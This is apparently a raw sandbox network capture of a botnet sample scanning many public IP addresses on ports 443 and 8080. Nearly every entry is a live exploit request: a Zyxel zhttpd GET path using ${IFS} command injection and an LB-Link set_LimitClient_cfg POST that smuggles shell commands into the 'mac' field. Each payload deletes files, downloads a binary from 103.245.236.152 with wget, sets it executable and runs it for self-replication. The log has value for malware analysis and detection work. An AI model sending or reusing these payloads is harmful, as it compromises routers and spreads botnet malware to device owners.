                                        Jan 14, 2024 16:18:41.384130001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3487192.168.2.1360504106.50.100.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384152889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3488192.168.2.1335542145.125.176.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384219885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3489192.168.2.134228271.252.105.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384253025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3490192.168.2.135933235.70.78.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384290934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3491192.168.2.13533382.62.220.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384315014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3492192.168.2.1357104125.124.226.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384352922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3493192.168.2.134236454.159.210.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384387970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3494192.168.2.1343664216.159.194.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384445906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3495192.168.2.1340540174.19.28.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384480953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3496192.168.2.1336482206.71.150.758080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.226650953 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3497192.168.2.1360742107.163.4.1938080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.348206043 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:43.952924967 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:45.872942924 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:49.809043884 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:57.488926888 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3498192.168.2.1338194130.244.120.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.391781092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3499192.168.2.1338194220.130.39.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.391845942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3500192.168.2.1342104216.237.230.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.391941071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3501192.168.2.1339044184.74.223.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.391997099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3502192.168.2.1336790148.111.180.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.391999960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3503192.168.2.1353694106.174.121.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392060995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3504192.168.2.1348610176.104.168.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392122984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3505192.168.2.135277260.66.95.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392205954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3506192.168.2.133318445.123.248.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392218113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3507192.168.2.133759866.67.34.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392235994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3508192.168.2.1358032104.228.169.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392302990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3509192.168.2.134251293.38.163.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392357111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3510192.168.2.1337536153.85.111.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392364979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3511192.168.2.1350572123.181.18.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392399073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3512192.168.2.1336108189.251.210.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392445087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3513192.168.2.1353450184.165.182.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392448902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3514192.168.2.1344284177.168.70.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392497063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3515192.168.2.1345634176.234.158.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392539978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3516192.168.2.135323476.188.129.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392589092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3517192.168.2.1332844164.193.69.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392627001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3518192.168.2.133890693.202.116.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392647028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3519192.168.2.133398457.113.148.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392652035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3520192.168.2.135138062.243.221.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392715931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3521192.168.2.13353342.89.20.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392729044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3522192.168.2.1346776123.180.153.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392750025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3523192.168.2.135394072.216.95.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392760038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3524192.168.2.1334134116.224.202.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392813921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3525192.168.2.1355376211.101.110.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392827988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3526192.168.2.1347818192.126.188.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392874956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3527192.168.2.133548489.170.106.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392915964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3528192.168.2.134886664.130.87.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392956972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3529192.168.2.1333744152.159.138.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.392992973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3530192.168.2.135981692.106.63.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393033981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3531192.168.2.133413091.152.68.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393100977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3532192.168.2.133759278.70.207.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393120050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3533192.168.2.1358360208.185.190.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393124104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3534192.168.2.1345664180.44.50.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393184900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3535192.168.2.1353260133.55.236.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393207073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
